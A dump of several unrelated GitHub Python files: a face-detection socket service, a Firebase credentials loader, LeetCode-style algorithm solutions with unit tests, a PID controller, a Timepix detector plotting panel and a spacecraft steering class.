tf.compat.v1.get_default_graph().get_tensor_by_name(\"embeddings:0\")\n return single_image, embeddings\n\n\n def load_image(self, image_path):\n image = cv2.imread(image_path)\n image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n\n return image\n\n\n def calc_distance(self, embedding1, embedding2):\n # Euclidian distance\n diff = np.subtract(embedding1, embedding2)\n dist = np.sum(np.square(diff),0)\n\n return dist\n\n\n def crop_faces(self, image, pnet, rnet, onet):\n minsize = 20 # minimum size of face\n threshold = [0.6, 0.7, 0.7] # three steps's threshold\n factor = 0.709 # scale factor\n\n margin = 44\n image_size = 160\n h,w,_ = np.shape(image)\n\n bounding_boxes, points = detect_face.detect_face(image, minsize, pnet, rnet, onet, threshold, factor)\n faces = []\n for box in bounding_boxes:\n box = np.int32(box)\n bb = np.zeros(4, dtype=np.int32)\n bb[0] = np.maximum(box[0]-margin/2, 0)\n bb[1] = np.maximum(box[1]-margin/2, 0)\n bb[2] = np.minimum(box[2]+margin/2, w)\n bb[3] = np.minimum(box[3]+margin/2, h)\n cropped = 
image[bb[1]:bb[3], bb[0]:bb[2],:]\n scaled = cv2.resize(cropped, (image_size, image_size), interpolation=cv2.INTER_LINEAR)\n\n faces.append(scaled)\n\n return faces, bounding_boxes\n\n def check_face(self):\n tf.compat.v1.reset_default_graph()\n \n model_path = os.path.dirname(os.path.abspath(__file__)) + \"/face_detection/models/20180402-114759.pb\"\n self.single_image, self.embeddings = self.load_model(model_path)\n\n self.sess = tf.compat.v1.Session()\n self.pnet, self.rnet, self.onet = detect_face.create_mtcnn(self.sess,None)\n\n path_me = glob.glob(os.path.dirname(os.path.abspath(__file__)) + \"/face_detection/data/faces/lsh/*\")\n embed_me = []\n\n for path in path_me:\n img = self.load_image(path)\n result = self.sess.run(self.embeddings, feed_dict={self.single_image:img})\n result = result[0]\n embed_me.append(result)\n\n embed_me = np.array(embed_me)\n\n path_other1 = glob.glob(os.path.dirname(os.path.abspath(__file__)) + \"/face_detection/data/faces/other1/*\")\n embed_other1 = []\n\n for path in path_other1:\n img = self.load_image(path)\n result = self.sess.run(self.embeddings, feed_dict={self.single_image:img})\n result = result[0]\n embed_other1.append(result)\n\n embed_other1 = np.array(embed_other1)\n\n path_other2 = glob.glob(os.path.dirname(os.path.abspath(__file__)) + \"/face_detection/data/faces/other2/*\")\n\n embed_other2 = []\n\n for path in path_other2:\n img = self.load_image(path)\n result = self.sess.run(self.embeddings, feed_dict={self.single_image:img})\n result = result[0]\n embed_other2.append(result)\n\n embed_other2 = np.array(embed_other2)\n\n\n def box_face(self, frame):\n tf.compat.v1.reset_default_graph()\n frame = np.array(frame)\n frame = frame.astype('float32')\n cv_frame = cv2.resize(frame,(400,225))\n\n image_frame = cv_frame.copy()\n faces, bounding_boxes = self.crop_faces(image_frame, self.pnet, self.rnet, self.onet)\n print(\"faces : \", faces)\n print(\"\\nboxed :\", bounding_boxes)\n for box in bounding_boxes:\n box = np.int32(box)\n \n p1 = [box[0], box[1]]\n p2 = [box[2], box[3]]\n result_frame = self.sess.run(self.embeddings, feed_dict={self.single_image:image_frame})\n result_frame = result_frame[0]\n\n # distance_th = 1.0\n\n # distance1 = self.calc_distance(embed_me[0], result_frame)\n # distance2 = self.calc_distance(embed_me[3], result_frame)\n\n # avg_distance = (distance1 + distance2) / 2\n # if(avg_distance < distance_th):\n # cv2.rectangle(image_frame, (box[0], box[1]), (box[2], box[3]), color=(0,255,0))\n # else:\n # cv2.rectangle(image_frame, (box[0], box[1]), (box[2], box[3]), color=(0,0,255))\n\n p1[0] = p1[0].tolist()\n p1[1] = p1[1].tolist()\n p2[0] = p2[0].tolist()\n p2[1] = p2[1].tolist()\n return [p1, p2]\n \n # if there is no face\n return [(-1, -1), (-1, -1)]\n\n\nif __name__==\"__main__\":\n fd = FaceDetector()\n fd.check_face()\n while True:\n recv_data = fd.socket.recv()\n if not recv_data: # recv_data == None, So break\n continue \n \n video_cap = msgpack.unpackb(recv_data)\n\n send_image = fd.box_face(video_cap)\n\n fd.socket.send(send_image)\n\n time.sleep(1.0)\n\n fd.socket.close()\n\n","repo_name":"hy-kiera/wadjet","sub_path":"jetson/jetson/src/face_detector.py","file_name":"face_detector.py","file_ext":"py","file_size_in_byte":5940,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"3046523371","text":"import os\nimport json\n\n# Store firebase credentials into json\n\nfirebase_credentials = {\n \"type\": \"service_account\",\n \"project_id\": 
\"spoke-ops-tool\",\n \"private_key_id\": \"065e9681e3928b7f1103ac7a5f9ee94eb3285f5a\",\n \"client_email\": \"firebase-adminsdk-hj3b2@spoke-ops-tool.iam.gserviceaccount.com\",\n \"client_id\": \"107771288516978348519\",\n \"auth_uri\": \"https://accounts.google.com/o/oauth2/auth\",\n \"token_uri\": \"https://accounts.google.com/o/oauth2/token\",\n \"auth_provider_x509_cert_url\": \"https://www.googleapis.com/oauth2/v1/certs\",\n \"client_x509_cert_url\": \"https://www.googleapis.com/robot/v1/metadata/x509/firebase-adminsdk-hj3b2%40spoke-ops-tool.iam.gserviceaccount.com\"\n}\n\ndef load_firebase_credentials_into_json():\n\tcredentials = {}\n\n\tfirebase_private_key = os.environ.get(\"FIREBASE_PRIVATE_KEY\")\n\tfirebase_credentials['private_key'] = firebase_private_key.replace('\\\\n', '\\n')\n\n\twith open(os.path.expanduser('firebase-service-acc-creds.json'), 'w', encoding=\"utf-8\") as jsonfile:\n\t\tjsonfile.write(json.dumps(firebase_credentials, indent=\"\\t\"))","repo_name":"Spoke-Repair/Delivery-Back-End","sub_path":"authenticate.py","file_name":"authenticate.py","file_ext":"py","file_size_in_byte":1056,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27615955916","text":"# 35. Search Insert Position\n# Easy\n# Array, Binary Search\n# https://leetcode.com/problems/search-insert-position\n#\n# Find the index where a target would be [left] inserted in an ordered list.\n# def searchInsert(self, nums: List[int], target: int) -> int:\n# Input: nums = [1,3,5,6], target = 5\n# Output: 2\n\nclass Solution:\n # Linear Search (Brute) | Time: O(n) | Space: O(1)\n def searchInsert(self, nums: list[int], target: int) -> int:\n for i, num in enumerate(nums):\n if num >= target:\n return i\n return len(nums)\n\n # Bisect Left | Time: O(log n) | Space: O(1)\n def searchInsert(self, nums: list[int], target: int) -> int:\n lo, hi = 0, len(nums)\n while lo < hi:\n mid = (lo + hi) // 2\n if nums[mid] < target:\n lo = mid + 1\n else:\n hi = mid\n return lo\n\n # bisect_left | Time: O(log n) | Space: O(1)\n def searchInsert(self, nums: list[int], target: int) -> int:\n from bisect import bisect_left\n return bisect_left(nums, target)\n","repo_name":"daviscvance/Practice","sub_path":"Leetcode/Python/bisection/easy/35-search-insert-position.py","file_name":"35-search-insert-position.py","file_ext":"py","file_size_in_byte":1083,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"12769251299","text":"from cmath import inf\nimport time\n\n\nclass PID:\n \"\"\"\n Implements a PID controller.\n \"\"\"\n\n def __init__(\n self, Kp: float, Ki: float, Kd: float, target: float, tau: float = 0\n ) -> None:\n \"\"\"\n\n Parameters\n ----------\n Kp : float\n Proportional gain.\n Ki : float\n Integration gain.\n Kd : float\n Derivative gain.\n tau : float\n Low pass filter time constant.\n target : float\n Target value.\n \"\"\"\n\n self.Kp = Kp\n self.Ki = Ki\n self.Kd = Kd\n self.tau = tau\n self.target = target\n self.Dterm = 0\n self.Iterm = 0\n self.last_error = 0\n self.last_time = time.time()\n self.last_feedback = 0\n self.last_output = 0\n self.set_limits(-inf, inf, -inf, inf)\n\n def set_limits(\n self, min: float = -inf, max: float = inf, min_int: float = -inf, max_int: float = inf\n ) -> None:\n \"\"\"\n Output limits.\n\n Parameters\n ----------\n min : float\n Minimum output.\n max : float\n Maximum output.\n \"\"\"\n self.max = max\n self.max_int = max_int\n self.min = min\n 
self.min_int = min_int\n\n def update(self, feedback: float) -> float:\n \"\"\"\n Calculate the PID output value.\n\n Parameters\n ----------\n feedback : float\n Value to be compared to the target.\n\n Returns\n -------\n float\n Output of the PID controller.\n \"\"\"\n error = self.target - feedback\n\n current_time = time.time()\n delta_time = current_time - self.last_time\n if delta_time == 0:\n print(\"-------------------------------------------------\")\n return self.last_output\n\n self.Pterm = self.Kp * error\n # self.Iterm += (error + self.last_error) * 0.5 * self.Ki * delta_time\n self.Iterm += error * self.Ki * delta_time\n # self.Dterm = -2 * self.Kd * (feedback - self.last_feedback) + (\n # 2 * self.tau - delta_time\n # ) * self.Dterm / (2 * self.tau + delta_time)\n self.Dterm = -self.Kd * (error - self.last_error) / delta_time\n\n if self.Iterm > self.max_int:\n self.Iterm = self.max_int\n elif self.Iterm < self.min_int:\n self.Iterm = self.min_int\n\n self.last_time = current_time\n self.last_error = error\n self.last_feedback = feedback\n\n print(f\"P: {self.Pterm}, I: {self.Iterm}, f: {feedback}\")\n\n output = self.Pterm + self.Iterm + self.Dterm\n if output < self.min:\n return self.min\n if output > self.max:\n return self.max\n self.last_output = output\n return output\n","repo_name":"robobe/rrbot_ws","sub_path":"src/rrbot_application/rrbot_application/pid_controller.py","file_name":"pid_controller.py","file_ext":"py","file_size_in_byte":2824,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30136746778","text":"import unittest\nimport sys\nfrom pathlib import Path\nimport collections\nfrom random import randrange\n\n# Definition for a binary tree node.\nclass TreeNode(object):\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\nclass SolutionSorting:\n \"\"\"\n sorts the array, then iterates through until a missing number is found\n uses quicksort to sort\n\n runtime: quicksort -> O(n log(n))\n iterating through sorted array -> O(n)\n total: O(n log(n) + n) == O(n log(n))\n\n space complexity: O(1) -> in place sort\n \"\"\"\n\n def find_smallest_positive_int(self, nums):\n \"\"\"Finds the first missing positive integer in list.\n \n :type nums: list\n :rtype: int\n \"\"\"\n nums = self.quicksort(nums)\n\n smallest_positive = 1\n\n for num in nums:\n if num < 1:\n continue\n \n elif smallest_positive == num:\n smallest_positive += 1\n else:\n return smallest_positive\n\n return smallest_positive\n\n\n def quicksort(self, arr, left=None, right=None):\n if left is None: left = 0\n if right is None: right = len(arr)-1\n\n if left < right: \n\n pivot = self.partition(arr, left, right)\n\n left_arr = self.quicksort( arr, left, pivot-1 )\n right_arr = self.quicksort( arr, pivot+1, right)\n\n return arr\n\n def choose_pivot(self, arr):\n return len(arr)\n\n def partition(self, arr, left, right):\n pivot = arr[right]\n\n i = left - 1\n\n for j in range(left, right):\n\n if arr[j] <= pivot:\n i+=1\n arr[j], arr[i] = arr[i], arr[j]\n\n arr[right], arr[i+1] = arr[i+1], arr[right]\n\n return i+1\n\n\n\nclass SolutionHashing:\n \"\"\"\n iterates through array and adds each value into a hashtable\n then iterates through the hashtable, from 1 to the largest number in the array\n until a value not in the array is found. 
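e.g. for [3, 4, -1, 1] the upward scan from 1 stops at the missing 2.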
returns that value\n if loop finishes, the largest value + 1 is returned\n\n # runtime analysis: O(n + n) == O(n)\n # space complexity: O(n) -> creating a hashtable of the same size as the array\n \"\"\"\n \n def find_smallest_positive_int(self, nums):\n hashtable = {}\n largest_num = 1\n for num in nums:\n if num not in hashtable:\n hashtable[num] = True\n\n if num > largest_num:\n largest_num = num\n\n for i in range(1, largest_num):\n if i not in hashtable:\n return i\n\n return largest_num + 1\n\n\nclass SolutionOptimal:\n\n def find_smallest_positive_int(self, nums):\n shift, nums = self.segregate(nums)\n\n nums = nums[shift:]\n\n if len(nums) == 0: return 1\n if len(nums) == 1:\n if nums[0] == 1: return 2\n else: return 1\n\n largest_num = nums[0]\n for num in nums:\n if num > largest_num:\n largest_num = num\n\n\n indexes = [-1] * (len(nums)+1)\n\n for num in nums:\n if num < len(nums)+1 and num > 0:\n indexes[num] = 1\n\n # if we find an index thats negative, thats our missing number. return it\n for index in range(1, len(indexes)):\n if indexes[index] < 1:\n print (\"indexes at return\", indexes, len(indexes))\n return index\n\n # otherwise all indexes are present, so return the index + 1\n return index + 1\n\n\n # puts all non-positive \n # (0 and negative) numbers on left side of nums \n # return count of such numbers, new array, and largest number fount\n def segregate(self, nums):\n i = 0\n neg_count = 0\n for j in range (0, len(nums)):\n if nums[j] <= 0:\n nums[j], nums[i] = nums[i], nums[j]\n i +=1\n neg_count +=1\n # if nums[-2] < 1: neg_count +=1\n return neg_count, nums\n\n\n\nclass TestFindMissingSmallestPositive(unittest.TestCase):\n\n # sorting solution tests\n def test_sorting_solution_one(self):\n solution = SolutionSorting()\n self.assertEqual( solution.find_smallest_positive_int([2, 3, 7, 6, 8, -1, -10, 15]), 1 )\n\n def test_sorting_solution_two(self):\n solution = SolutionSorting()\n self.assertEqual( solution.find_smallest_positive_int([ 2, 3, -7, 6, 8, 1, -10, 15]), 4 )\n\n def test_sorting_solution_three(self):\n solution = SolutionSorting()\n self.assertEqual( solution.find_smallest_positive_int([3, 4, -1, 1]), 2 )\n\n def test_sorting_solution_four(self):\n solution = SolutionSorting()\n self.assertEqual( solution.find_smallest_positive_int([1, 2, 0]), 3 )\n\n # hashing solution tests\n def test_hashing_solution_one(self):\n solution = SolutionHashing()\n self.assertEqual( solution.find_smallest_positive_int([2, 3, 7, 6, 8, -1, -10, 15]), 1 )\n\n def test_hashing_solution_two(self):\n solution = SolutionHashing()\n self.assertEqual( solution.find_smallest_positive_int([ 2, 3, -7, 6, 8, 1, -10, 15]), 4 )\n\n def test_hashing_solution_three(self):\n solution = SolutionHashing()\n self.assertEqual( solution.find_smallest_positive_int([3, 4, -1, 1]), 2 )\n\n def test_hashing_solution_four(self):\n solution = SolutionHashing()\n self.assertEqual( solution.find_smallest_positive_int([1, 2, 0]), 3 )\n\n def test_optimal_solution_one(self):\n solution = SolutionOptimal()\n self.assertEqual( solution.find_smallest_positive_int([2, 3, 7, 6, 8, -1, -10, 15]), 1 )\n\n def test_optimal_solution_two(self):\n solution = SolutionOptimal()\n self.assertEqual( solution.find_smallest_positive_int([ 2, 3, -7, 6, 8, 1, -10, 15]), 4 )\n\n def test_optimal_solution_three(self):\n solution = SolutionOptimal()\n self.assertEqual( solution.find_smallest_positive_int([3, 4, -1, 1]), 2 )\n\n def test_optimal_solution_four(self):\n solution = SolutionOptimal()\n self.assertEqual( 
solution.find_smallest_positive_int([1, 2, 0]), 3 )\n \n def test_optimal_solution_five(self):\n solution = SolutionOptimal()\n self.assertEqual( solution.find_smallest_positive_int([-10,-3,-100,-1000,-239,1]), 2)\n\n def test_optimal_solution_six(self):\n solution = SolutionOptimal()\n self.assertEqual( solution.find_smallest_positive_int([-4,-5,0,-2,-6,-3,-6,8,4,-4]), 1)\n\n def test_optimal_solution_seven(self):\n solution = SolutionOptimal()\n self.assertEqual( solution.find_smallest_positive_int([1, 0]), 2)\n\n def test_optimal_solution_eight(self):\n solution = SolutionOptimal()\n self.assertEqual( solution.find_smallest_positive_int([1,1000]), 2)\n\n def test_optimal_solution_nine(self):\n solution = SolutionOptimal()\n self.assertEqual( solution.find_smallest_positive_int([2, 1]), 3)\n \n\n \n\nif __name__ == \"__main__\":\n file = Path(__file__).resolve()\n parent, top = file.parent, file.parents[2]\n\n sys.path.append(str(top))\n try:\n sys.path.remove(str(parent))\n except ValueError: # Already removed\n pass\n\n __package__ = 'TestFindMissingSmallestPositive.tests'\n\n unittest.main()","repo_name":"seb-patron/Algorithms-and-Data-Structures","sub_path":"Interview_Prep/daily_coding_problem/4.smallest_positive_number_missing/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":7346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32113315805","text":"from collections import deque\n\nimport numpy as np\nfrom scipy.stats import binned_statistic_2d\nimport pyqtgraph as pg\nfrom pyqtgraph.Qt import QtGui, QtWidgets\n\nfrom .timepix_setup_histogram import TimepixSetupHistogram\nfrom .ui.timepixsetupplotspanelui import Ui_DockWidget\n\n# ATTENTION! If the defined initial values below are equal to the initial values defined in the .ui file, the onChange\n# events are not triggered for initialization. Be carefull when changing the initial values here and check against those\n# in the .ui file!\nINITIAL_NUMBER_PACKETS = 10\nINITIAL_RANGE_TOF_MINIMUM = 0\nINITIAL_RANGE_TOF_MAXIMUM = 5\nINITIAL_RANGE_TOT_MINIMUM = 0\nINITIAL_RANGE_TOT_MAXIMUM = 1000\n\n# The bins for the histogram of the clustersize are constant. Therefor they are calculated only once.\nCLUSTER_SIZE_BINS = np.linspace(0, 400, 100, dtype=np.float64)\n\n\nclass TimepixSetupPlotsPanel(QtWidgets.QDockWidget, Ui_DockWidget):\n \"\"\"User interface to display some graphs and plots that are useful for setting up\n the timepix camera for experiments.\n\n The data displayed here can be aggregated for\n a specified number of packages. One package is the amount of information that is\n provided by the UDP sampler in a single packet. The size of a packet depends significantly\n on the datarate of the timepix camera and can vary heavily. 
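Internally the panel keeps the last N per-packet results in deques and\n combines them (summed histograms, averaged binned statistics) before display.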
For a lower datarate it is required\n to increase the number of integrated packets to get better statistics.\"\"\"\n\n def __init__(self, parent=None):\n super(TimepixSetupPlotsPanel, self).__init__(parent)\n\n # Set up the user interface from Designer.\n self.setupUi(self)\n\n self.__events_2d_hist_buffer = None\n\n self.__centroids_2d_hist_mean_buffer = None\n self.__centroids_2d_hist_max_buffer = None\n\n self.__tot_bins = None\n self.__tof_bins = None\n\n self.numberPacketsSpinBox.valueChanged.connect(self.onNumberPacketsChanged)\n self.toFRangeMinimumDoubleSpinBox.valueChanged.connect(\n self.toFRangeMinimumChanged\n )\n self.toFRangeMaximumDoubleSpinBox.valueChanged.connect(\n self.toFRangeMaximumChanged\n )\n self.toTRangeMinimumSpinBox.valueChanged.connect(self.toTRangeMinimumChanged)\n self.toTRangeMaximumSpinBox.valueChanged.connect(self.toTRangeMaximumChanged)\n self.pushButtonReset.clicked.connect(self.__reset_buffers)\n self.pushButtonSnapshot.clicked.connect(self.__snapshot)\n\n self.numberPacketsSpinBox.setValue(INITIAL_NUMBER_PACKETS)\n self.toFRangeMinimumDoubleSpinBox.setValue(INITIAL_RANGE_TOF_MINIMUM)\n self.toFRangeMaximumDoubleSpinBox.setValue(INITIAL_RANGE_TOF_MAXIMUM)\n self.toTRangeMinimumSpinBox.setValue(INITIAL_RANGE_TOT_MINIMUM)\n self.toTRangeMaximumSpinBox.setValue(INITIAL_RANGE_TOT_MAXIMUM)\n\n def setupUi(self, dock_widget):\n result = super().setupUi(dock_widget)\n\n # Event Data Plots Preparation\n self._event_data_tot_histogram = TimepixSetupHistogram(\n self.plt_event_data_histogram_tot, \"Count\", \"ToT (ns)\"\n )\n self.plt_event_data_2d_histogram_tof_tot = self.__setup_2d_hist_ui(\n \"plt_event_data_2d_histogram_tof_tot\", (2, 0), \"ToT\", \"ToF\"\n )\n self.plt_event_data_2d_histogram_x_y_tot = self.__setup_2d_hist_ui(\n \"plt_event_data_2d_histogram_tof_tot\", (3, 0), \"x (pixel)\", \"y (pixel)\"\n )\n self.plt_event_data_2d_histogram_x_y_tot.setPredefinedGradient('bipolar')\n\n # Centroided Data Plots Preparation\n self._centroided_data_mean_tot_histogram = TimepixSetupHistogram(\n self.plt_centroided_data_histogram_mean_tot, \"Count\", \"Mean ToT (ns)\"\n )\n\n self._centroided_data_max_tot_histogram = TimepixSetupHistogram(\n self.plt_centroided_data_histogram_max_tot, \"Count\", \"Max ToT (ns)\"\n )\n\n self.plt_centroided_data_2d_histogram_tof_mean_tot = self.__setup_2d_hist_ui(\n \"plt_centroided_data_2d_histogram_tof_mean_tot\", (2, 1), \"Mean ToT\", \"ToF\"\n )\n\n self.plt_centroided_data_2d_histogram_tof_max_tot = self.__setup_2d_hist_ui(\n \"plt_centroided_data_2d_histogram_tof_max_tot\", (2, 2), \"Max ToT\", \"ToF\"\n )\n\n self._centroided_data_cluster_size_histogram = TimepixSetupHistogram(\n self.plt_centroided_data_histogram_size, \"Count\", \"Cluster Size\", None\n )\n\n return result\n\n def __setup_2d_hist_ui(self, name, position, label_left, label_bottom):\n plt_2d_hist = pg.ImageView(view=pg.PlotItem())\n plt_2d_hist.setObjectName(name)\n self.gridLayout.addWidget(plt_2d_hist, position[0], position[1], 1, 1)\n\n plt_2d_hist.setPredefinedGradient(\"thermal\")\n plt_2d_hist.getView().setLabel(\"bottom\", text=label_left)\n plt_2d_hist.getView().setLabel(\"left\", text=label_bottom)\n plt_2d_hist.getView().invertY(False)\n plt_2d_hist.getView().setAspectLocked(False)\n\n return plt_2d_hist\n\n def onNumberPacketsChanged(self, number_packets):\n if number_packets == 0:\n number_packets = None\n self.pushButtonReset.setEnabled(True)\n else:\n self.pushButtonReset.setEnabled(False)\n self.__init_buffers(number_packets)\n\n def 
__init_buffers(self, number_packets=None):\n self._event_data_tot_histogram.init_buffer(number_packets)\n self.__events_2d_hist_buffer = deque(maxlen=number_packets)\n self.__events_2d_binnedstat_buffer = deque(maxlen=number_packets)\n\n self._centroided_data_mean_tot_histogram.init_buffer(number_packets)\n self._centroided_data_max_tot_histogram.init_buffer(number_packets)\n self.__centroids_2d_hist_mean_buffer = deque(maxlen=number_packets)\n self.__centroids_2d_hist_max_buffer = deque(maxlen=number_packets)\n self._centroided_data_cluster_size_histogram.init_buffer(number_packets)\n\n def __reset_buffers(self):\n self.__reset_tof_buffers()\n self.__reset_tot_buffers()\n\n def __reset_tof_buffers(self):\n if self.__events_2d_hist_buffer is not None:\n self.__events_2d_hist_buffer.clear()\n if self.__events_2d_binnedstat_buffer is not None:\n self.__events_2d_binnedstat_buffer.clear()\n if self.__centroids_2d_hist_mean_buffer is not None:\n self.__centroids_2d_hist_mean_buffer.clear()\n if self.__centroids_2d_hist_max_buffer is not None:\n self.__centroids_2d_hist_max_buffer.clear()\n\n def __reset_tot_buffers(self):\n self._event_data_tot_histogram.clear_buffer()\n if self.__events_2d_hist_buffer is not None:\n self.__events_2d_hist_buffer.clear()\n if self.__events_2d_binnedstat_buffer is not None:\n self.__events_2d_binnedstat_buffer.clear()\n\n self._centroided_data_mean_tot_histogram.clear_buffer()\n self._centroided_data_max_tot_histogram.clear_buffer()\n if self.__centroids_2d_hist_mean_buffer is not None:\n self.__centroids_2d_hist_mean_buffer.clear()\n if self.__centroids_2d_hist_max_buffer is not None:\n self.__centroids_2d_hist_max_buffer.clear()\n\n def __snapshot(self):\n self._event_data_tot_histogram.snapshot(self.__tot_bins)\n self._centroided_data_max_tot_histogram.snapshot(self.__tot_bins)\n self._centroided_data_mean_tot_histogram.snapshot(self.__tot_bins)\n self._centroided_data_cluster_size_histogram.snapshot(CLUSTER_SIZE_BINS)\n\n def toFRangeMinimumChanged(self, tof_range_minimum):\n self.tof_range_changed()\n tof_range_maximum = self.toFRangeMaximumDoubleSpinBox.value()\n if tof_range_maximum is not None:\n self.__update_bins_tof(tof_range_minimum, tof_range_maximum)\n\n def toFRangeMaximumChanged(self, tof_range_maximum):\n self.tof_range_changed()\n tof_range_minimum = self.toFRangeMinimumDoubleSpinBox.value()\n if tof_range_minimum is not None:\n self.__update_bins_tof(tof_range_minimum, tof_range_maximum)\n\n def toTRangeMinimumChanged(self, tot_range_minimum):\n self.tot_range_changed()\n tot_range_maximum = self.toTRangeMaximumSpinBox.value()\n if tot_range_maximum is not None:\n self.__update_bins_tot(tot_range_minimum, tot_range_maximum)\n\n def toTRangeMaximumChanged(self, tot_range_maximum):\n self.tot_range_changed()\n tot_range_minimum = self.toTRangeMinimumSpinBox.value()\n if tot_range_minimum is not None:\n self.__update_bins_tot(tot_range_minimum, tot_range_maximum)\n\n def tof_range_changed(self):\n self.__reset_tof_buffers()\n\n def tot_range_changed(self):\n self.__reset_tot_buffers()\n\n def __update_bins_tot(self, tot_min, tot_max):\n self.__tot_bins = range(tot_min, tot_max + 25, 25)\n\n def __update_bins_tof(self, tof_min, tof_max):\n self.__tof_bins = np.linspace(tof_min, tof_max, 50)\n\n def __update_events(self, tof, tot, x, y):\n self._event_data_tot_histogram.refresh(tot, np.array(self.__tot_bins))\n self.__plot_2d_histogram(\n tot,\n tof,\n (self.__tot_bins, self.__tof_bins),\n self.__events_2d_hist_buffer,\n 
self.plt_event_data_2d_histogram_tof_tot,\n )\n self.__plot_2d_binned_stat(\n x, y, tot,\n (range(256), range(256)),\n self.__events_2d_binnedstat_buffer,\n self.plt_event_data_2d_histogram_x_y_tot)\n\n def __update_centroids(self, tof, tot_mean, tot_max, cluster_size):\n # ToT (mean) histogram\n self._centroided_data_mean_tot_histogram.refresh(\n tot_mean, np.array(self.__tot_bins)\n )\n\n # ToF-ToT (mean) correlation\n self.__plot_2d_histogram(\n tot_mean,\n tof,\n (self.__tot_bins, self.__tof_bins),\n self.__centroids_2d_hist_mean_buffer,\n self.plt_centroided_data_2d_histogram_tof_mean_tot,\n )\n\n # ToT (max) histogram\n self._centroided_data_max_tot_histogram.refresh(\n tot_max, np.array(self.__tot_bins)\n )\n\n # ToF-ToT (max) correlation\n self.__plot_2d_histogram(\n tot_max,\n tof,\n (self.__tot_bins, self.__tof_bins),\n self.__centroids_2d_hist_max_buffer,\n self.plt_centroided_data_2d_histogram_tof_max_tot,\n )\n\n # Cluster size histogram\n self._centroided_data_cluster_size_histogram.refresh(\n cluster_size, CLUSTER_SIZE_BINS\n )\n\n def __plot_2d_histogram(self, data_x, data_y, bins, buffer, plt):\n image = np.histogram2d(data_x, data_y * 1e6, bins=bins)[0]\n buffer.append(image)\n\n img = sum(buffer)\n\n x0, x1 = (bins[0][0], bins[0][-1])\n y0, y1 = (bins[1][0], bins[1][-1])\n xscale = (x1 - x0) / img.shape[0]\n yscale = (y1 - y0) / img.shape[1]\n plt.setImage(\n img / img.max(),\n scale=[xscale, yscale / 1000],\n pos=[x0, y0 / 1000],\n autoRange=False,\n autoLevels=False,\n autoHistogramRange=False,\n )\n\n def __plot_2d_binned_stat(self, data_x, data_y, data_z, bins, buffer, plt):\n image, x_bins, y_bins, _ = binned_statistic_2d(\n data_x, data_y, data_z, bins=(range(256), range(256)))\n buffer.append(np.nan_to_num(image))\n\n img = np.mean(buffer, axis=0)\n\n x0, x1 = (x_bins[0], x_bins[-1])\n y0, y1 = (y_bins[0], y_bins[-1])\n xscale = (x1 - x0) / img.shape[0]\n yscale = (y1 - y0) / img.shape[1]\n plt.setImage(\n img,\n scale=[xscale, yscale],\n pos=[x0, y0],\n autoRange=False,\n autoLevels=False,\n autoHistogramRange=False,\n )\n\n def on_event(self, events):\n self.__update_events(events[3], events[4], events[1], events[2])\n\n def on_centroid(self, centroids):\n self.__update_centroids(centroids[3], centroids[4], centroids[5], centroids[6])\n","repo_name":"CFEL-CMI/pymepix-viewer","sub_path":"pymepixviewer/panels/timepixsetupplotspanel.py","file_name":"timepixsetupplotspanel.py","file_ext":"py","file_size_in_byte":12080,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"61"} +{"seq_id":"16766236280","text":"import sys\n\nsys.stdin = open(\"input.txt\")\n\nt = int(input())\n\nfor tc in range(1, t + 1):\n arr = list(map(int, input().split()))\n n = 10\n result = 0 # 결과값 초기화 (0 or 1 로 나와야함)\n for i in range(1, 1<공집합 제외\n total = 0\n for j in range(n):\n if i & (1< 1:\n potencia = velocidad * 10 / distancia\n else:\n # angulo = cuerpo_celeste.angulo_con(self)\n potencia = velocidad * 12\n else:\n angulo = cuerpo_celeste.angulo_con(self)\n potencia = 0\n\n potencia = self.__esperar_a_angulo(angulo, potencia)\n\n juego.enviar_datos(angulo, potencia)\n\n def frenar(self):\n angulo = self.velocidad.inverse.rotation_deg()\n potencia = 6\n potencia = self.__esperar_a_angulo(angulo, potencia)\n juego.enviar_datos(angulo, potencia)\n\n # def frenar_orbita(self, cuerpo_celeste: CuerpoCeleste, vel_orbital):\n # if vel_orbital > 0:\n # angulo = cuerpo_celeste.angulo_con(self) - 90\n # potencia = 2\n # elif vel_orbital < 0:\n # angulo = 
cuerpo_celeste.angulo_con(self) + 90\n # potencia = 2\n # else:\n # angulo = self.angulo\n # potencia = 0\n #\n # potencia = self.__esperar_a_angulo(angulo, potencia)\n #\n # juego.enviar_datos(angulo, potencia)\n\n def velocidad_orbital_con(self, cuerpo_celeste: CuerpoCeleste, ult_ang) -> float:\n return cuerpo_celeste.angulo_con(self) - ult_ang\n\n def ir_a_cuerpo_celeste(self, cuerpo_celeste: CuerpoCeleste):\n angulo = self.angulo_con(cuerpo_celeste)\n if self.velocidad.module < 1 or self.velocidad.validate_angle_deg_with(self.direccion_a(cuerpo_celeste), 30):\n potencia = 1.5\n else:\n potencia = 1\n # potencia = self.__esperar_a_angulo(angulo, potencia)\n juego.enviar_datos(angulo, potencia)\n\n def despegar_de(self, cuerpo_celeste: CuerpoCeleste):\n angulo = cuerpo_celeste.angulo_con(self)\n if self.velocidad.module < 1 or self.velocidad.validate_angle_deg_with(self.direccion_a(cuerpo_celeste), 160):\n potencia = 6.5\n else:\n potencia = 1\n potencia = self.__esperar_a_angulo(angulo, potencia)\n juego.enviar_datos(angulo, potencia)\n\n def __esperar_a_angulo(self, angulo, potencia):\n return potencia if abs(self.angulo - angulo) < 10 else 0\n","repo_name":"AlberLC/rocket-training","sub_path":"Assets/ScriptsExternos/nave.py","file_name":"nave.py","file_ext":"py","file_size_in_byte":2884,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
